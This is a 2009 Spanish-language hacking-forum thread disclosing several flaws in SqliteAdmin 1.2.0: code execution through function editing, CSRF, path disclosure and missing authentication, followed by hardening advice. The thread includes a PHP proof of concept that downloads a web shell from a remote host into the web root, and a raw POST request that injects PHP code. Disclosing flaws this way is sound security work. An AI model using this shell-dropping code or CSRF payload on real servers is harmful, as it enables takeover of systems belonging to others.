elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Múltiples vulnerabilidades en SqliteAdmin 1.2.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Múltiples vulnerabilidades en SqliteAdmin 1.2.0  (Leído 3,756 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Múltiples vulnerabilidades en SqliteAdmin 1.2.0
« en: 12 Julio 2009, 06:10 am »

Bueno, encontré multiples vulnerabilidades en Sqliteadmin las cuales son las siguientes:


Remote Execution
Hay ejecución remota cuando vas a la sección de bases de datos y le haces click en cualqueir función, entonces editas una función y al guardarla ya se estará ejecutando el código automáticamente:

Conversado con una persona me decía que esto no es arbitrario ya que el sistema deja por defecto crear funciones, pero .... normalmente no debería ejecutarse todo código que se escriba, normalmente debería quedar encerrado en una clase publica de forma que si hay una ejecución forzada no debería ejecutarse hasta que la función realmente sea llamada o necesitada y no cargar todo en memoria como se hace actualmente dejando desprotegido el sistema, a mucho debería tener un input para dictar el nombre de la función y un filtro que verifique que todas las llaves están correctamente cerradas para evitar el escape hacia fuera de la función.
Debería?... nop, no debería.

PoC:
Código
  1. $shell = file_get_contents('http://host/mi_shell_aca');
  2. $out = 'c:\\wamp\\www\\x.php';
  3. if(file_exists($out)) unlink($out);
  4. $h = fopen($out, 'x');
  5. fwrite($h, $shell);
  6. fclose($h);
  7.  
Fijarse que en win los slash son dobles "\\" porque uno solo es escape de carácter, es como decir "^<" en batch.


CSRF

Citar
http://censurado/sqlitemanager/main.php?dbsel=1
POST /sqlitemanager/main.php?dbsel=1 HTTP/1.1
Host: requetecensurado :p
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3,
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://censurado/sqlitemanager/main.php?dbsel=1&function=IF&action=modify
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
FunctName=IF&FunctType=1&FunctCode=echo+%27test%27%3B%0D%0Afunction+sqliteIf%28%24compare%2C+%24good%2C+%24bad%29%7B%0D%0A++++if+%28%24compare%29+%7B%0D%0A++++++++return+%24good%3B%0D%0A++++%7D+else+%7B+%0D%0A++++++++return+%24bad%3B%0D%0A++++%7D%0D%0A%7D&FunctFinalCode=&FunctNumArgs=3&FunctAttribAll=1&function=IF&id=1&action=save
No hay un token de verificación ni nada que impida la ejecución arbitraria de lo que al atacante se le antoje.


Path Disclosure
Puedes dar una ejecución arbitraria con error forzado y te arrojará un path disclosure:

La solución sería nunca mostrar error_reporting(E_ALL) en un sistema publicado.


Falta de Autificación
Como no hay un login de autentificación por defecto en este sistema pasa lo que pasa.


Consecuencias



Recomendaciones

Poner en un lugar mas inaccesible este sistema para que no pueda ser manipulado de forma externa y agregarle un login de seguridad como por ejemplo un auth de apache con htaccess.


Saludos.
« Última modificación: 13 Julio 2009, 03:45 am por WHK » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Múltiples vulnerabilidades en SqliteAdmin 1.2.0
« Respuesta #1 en: 12 Julio 2009, 13:56 pm »

muy bueno, te felicito
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Múltiples vulnerabilidades en Oscommerce 2.2 RC2a « 1 2 3 »
Nivel Web
WHK 21 31,332 Último mensaje 6 Julio 2012, 23:15 pm
por kalimoro
e107 [Múltiples vulnerabilidades]
Nivel Web
Shell Root 1 5,253 Último mensaje 18 Diciembre 2010, 07:30 am
por berz3k
Múltiples vulnerabilidades en Cisco Unified Operations Manager
Noticias
wolfbcn 0 1,743 Último mensaje 22 Mayo 2011, 13:33 pm
por wolfbcn
Múltiples vulnerabilidades en cliente Novell iPrint
Noticias
wolfbcn 0 1,360 Último mensaje 10 Junio 2011, 17:46 pm
por wolfbcn
pregunta sobre PHP 5.2 <02/05/14 múltiples vulnerabilidades
Bugs y Exploits
cebs 1 3,728 Último mensaje 1 Septiembre 2011, 03:52 am
por nkni
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines